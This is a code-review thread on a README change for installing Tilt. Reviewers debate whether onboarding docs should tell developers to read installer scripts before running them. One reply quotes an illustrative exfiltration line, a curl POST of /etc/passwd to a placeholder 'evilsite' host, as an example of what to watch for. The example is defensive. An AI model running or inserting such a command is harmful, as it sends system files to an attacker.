README.md

```diff
@@ -28,12 +28,18 @@ There are some exceptions:
    * mac: `brew install go-task/tap/go-task`
    * via npm: `npm install -g @go-task/cli`
  * install [Tilt](https://docs.tilt.dev/) and add it to your path
-   * on Linux, a good practice is to create `$HOME/.local/bin` and put binaries there; most distributions automatically add `$HOME/.local/bin` to your path if it exists
-     * don't forget to run `chmod +x $HOME/.local/bin/tilt`
-   * on Windows, we suggest creating a `bin` folder in your home folder. Put the Tilt binary there, then do the following:
+   * on Linux, do NOT blindly follow the instructions that tell you to download and run `install.sh` without reading it!
+     * Instead, run `curl -L -o install-tilt.sh https://raw.githubusercontent.com/tilt-dev/tilt/master/scripts/install.sh` and read the script
+     * The script should be downloading Tilt from GitHub and installing it into `$HOME/.local/bin`
+     * If it's doing anything else, do NOT run it!
```

Comment:
This seems odd to me.
The purpose of our Readme is just to explain how to get up and running, not be a tutorial on security practices, right?
If we can't trust Tilt than we're already screwed and if the tilt reviewers overlooked an introduced vulnerability from a dishonest contributor, than we're not likely to notice the vulnerability in the installer either, even if we read through it.

Reply:
Yes, but this kind of thing is everywhere. All over the place, people are telling you to download and run their installer script, and nobody tells you that you should review it first. I'm sick and tired of bad security practices being pushed all over the place, and I want anyone we on-board to know that that's bad practice. (Which some of them might be unaware of given that this bad practice is, as I previously mentioned, EVERYWHERE).

Reply:
What if we comprimised by changing line 30 to something like:
`* install [Tilt](https://docs.tilt.dev/) and add it to your path (it’s good practice to review installer scripts before running them)`

Reply:
So, I'm curious: You go through each line of every script you download?

Reply:
I agree, let's just say something but we don't need to teach them about running scripts from the internet

Reply:
> So, I'm curious: You go through each line of every script you run?

If it's one I've just downloaded from the Internet? Yes. I scan it quickly to make sure that what it's doing looks sensible. I don't give it a one-hour security review or anything, but I do glance through and make sure there's no `curl -X POST /etc/passwd https://evilsite.example.cn/upload` lines that don't belong.

But I'll rephrase this to be a simple "(reminder: read the script before running it)". The main point of this PR is that the script automatically creates `~/.local/bin` for you, so I want to make sure the README instructions are updated to take that into account. The "don't run installers blindly without reading them" text is a minor point.

Reply:
in our team meeting we agreed to tone down the security standpoint and simplify what we explain

Reply:
Updated instructions in commit 2cd65b86.